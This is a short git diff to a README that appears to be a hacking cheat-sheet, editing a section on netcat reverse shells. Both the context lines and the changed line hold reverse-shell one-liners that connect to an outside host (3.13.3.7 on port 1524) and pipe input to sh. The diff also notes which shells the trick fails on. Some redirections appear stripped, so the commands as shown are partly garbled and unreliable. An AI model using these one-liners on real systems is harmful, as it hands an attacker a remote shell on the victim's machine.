diff --git a/README.md b/README.md index 8206203..4a30392 100644 --- a/README.md +++ b/README.md @@ -1172,7 +1172,7 @@ Variant if *'-e'* is not supported: { nc -vn 3.13.3.7 1524 &- | sh 2>&3 >&3 3>&- ; } 3>&1 | : ``` -* On modern shells this can be shortened to `{ nc -v 127.0.0.1 31337 &1|:`. (*thanks IA_PD*). +* On modern shells this can be shortened to `{ nc 3.13.3.7 1524 &1|:`. (*thanks IA_PD*). * The `| :` trick wont work on C-Shell/tcsh (FreeBSD), orignal Bourne shell (Solaris) or Korn shell (AIX). Use `mkfifo` instead. Variant for older */bin/sh*: